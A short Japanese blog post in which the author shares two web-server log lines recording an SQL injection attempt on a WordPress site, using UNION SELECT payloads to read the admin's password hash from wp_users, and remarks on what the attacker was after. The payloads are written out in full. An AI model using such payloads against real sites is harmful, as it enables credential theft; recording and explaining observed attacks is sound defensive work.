まとまりのないブログ

something which something is something

sql Tips wordpress

sqlインジェクション

投稿日: 

ns.km22518.keymachine.de - - [19/Jul/2008:22:25:12 +0900] "GET /wordpress/index.php?cat=%27+UNION+SELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14883 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"
ns.km22518.keymachine.de - - [19/Jul/2008:22:25:14 +0900] "GET /wordpress/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* HTTP/1.1" 200 14877 "-" "Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)"

パスワードを割り出そうとしているのか。wordpressのユーザidの1番目のパスワードをselectで取得しようとしているのがログから読み取れる。

-sql, Tips, wordpress

執筆者:

comment

メールアドレスが公開されることはありません。

日本語が含まれない投稿は無視されますのでご注意ください。(スパム対策)

関連記事

no image

Tomcatアプリケーションにおけるクラス利用

って必要性がないような気がする。JAVAなのでクラスは作成して利用することができるがTomcatアプリケーションはクラスを自分で作ってまで実装するような複雑なシステムにはならないような。同じことはPH …

no image

HAPROXYに関する雑記

enable statsについて haproxyのstatsを表示するにはコンフィグの各セクションでenable statsを追記すればいいらしいがmode httpの場合だけ見ることができる様子。n …

no image

Apache2のMPMをpreforkからworkerへ変更する

apache2をapt-getにて適当にインストールしたらデフォルトではMPMはpreforkでインストールされる。これをworkerに変えるにはどうしたらいいのかと調べてみて,下記のように実行したら …

no image

テーブルの列の型を変える(列属性の変更)

mysqlの場合。 ケース1:テーブルのある列の型をtext型で作成してシステムを運用してみたところ、実際にはせいぜい8000文字程度しか使用されていないことがわかったためvarchar型の可変長10 …

wordpressでアップロードしたファイルを○○○に移動できませんでしたという現象が発生する場合

ワードプレスでメディアから画像をアップロードまたは記事投稿時に画像をアップロードしようとしたら画像アップロードが完了しないというエラーが発生した。調べたところ、エラーの原因の多くは画像ファイルの移動さ …

PREV
フレームワークの有効性
NEXT
mysqlへjdbc接続した場合に文字化けが発生する

no image

2023/03/27

ChatGPTを使ってみたがまだデータ的なことは不安定

no image

2023/03/14

ドメインの更新料金が去年の1.5倍になってる件

no image

2023/03/13

google chrome で右クリックから検索を選択したときにサイドのパネルに表示されてしまう件

no image

2023/03/03

初代ゲームボーイをips液晶化にカスタマイズした

no image

2023/02/03

肉と植物油をやめるとアトピーが抑えられる

最近のコメント

カテゴリー

固定ページ

メタ情報

リンク